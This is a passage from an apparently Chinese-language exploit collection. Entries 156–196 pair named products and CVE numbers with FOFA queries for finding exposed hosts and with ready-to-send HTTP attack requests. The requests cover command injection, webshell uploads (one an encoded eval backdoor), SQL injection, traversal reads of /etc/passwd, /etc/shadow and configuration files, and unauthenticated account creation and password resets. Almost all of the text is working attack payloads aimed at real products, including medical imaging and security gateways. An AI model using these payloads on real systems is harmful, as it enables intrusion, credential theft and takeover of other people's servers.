Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest
-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png
<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
156. TBK DVR-4104/DVR-4216 操作系统命令注入
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip
157. 美特CRM upload.jsp 任意文件上传
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream
nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"
null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"
null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"
null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"
null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"
null
------WebKitFormBoundary1imovELzPsfzp5dN--
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
158. Mura-CMS-processAsyncObject存在SQL注入
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
object=displayregion&contenthistid=x\'&previewid=1
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
160. Sonatype Nexus Repository 3目录遍历与文件读取
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
FOFA:body="/KT_Css/qd_defaul.css"
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>
http://x.x.x.x/dizxdell.aspx
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream
<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"
upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"
ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"
/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"
1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg
rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip
------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
165. OrangeHRM 3.3.3 SQL 注入
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web/index.php/admin/viewProjects?sortField=customerName&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
166. 中成科信票务管理平台SeatMapHandler SQL注入
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
167. 精益价值管理系统 DownLoad.aspx任意文件读取
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
168. 宏景EHR OutputCode 任意文件读取
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
169. 宏景EHR downlawbase SQL注入
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
filename=../webapps/ROOT/WEB-INF/web.xml
171. 通天星CMSV6车载定位监控平台 SQL注入
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
172. DT-高清车牌识别摄像机任意文件读取
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
173. Check Point 安全网关任意文件读取
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
aCSHELL/../../../../../../../etc/shadow
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
176. 电信网关配置管理系统 rewrite.php 文件上传
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png
<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"
------WebKitFormBoundaryOKldnDPT--
177. H3C路由器敏感信息泄露
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255
12234
-----------------aqutkea7vvanpqy3rh2l--
GET /imc/primepush/%2e%2e/flex/12234.txt
179. 建文工程管理系统存在任意文件读取
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
path=../log4net.config&Name=
180. 帮管客 CRM jiliyu SQL注入
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
username=test1234&pwd=test1234&savedays=1
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
185. 瑞友天翼应用虚拟化系统SQL注入
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host
186. F-logic DataCube3 SQL注入
CVE-2024-31750
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
187. Mura CMS processAsyncObject SQL注入
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
188. 叁体-佳会视频会议 attachment 任意文件读取
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
poi=file:///etc/passwd
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain
<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"
{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
FOFA:title=="飞鱼星企业级智能上网行为管理系统
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
196. 河南省风速科技统一认证平台密码重置
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close
{"xgh":"test","newPass":"test666","email":""}
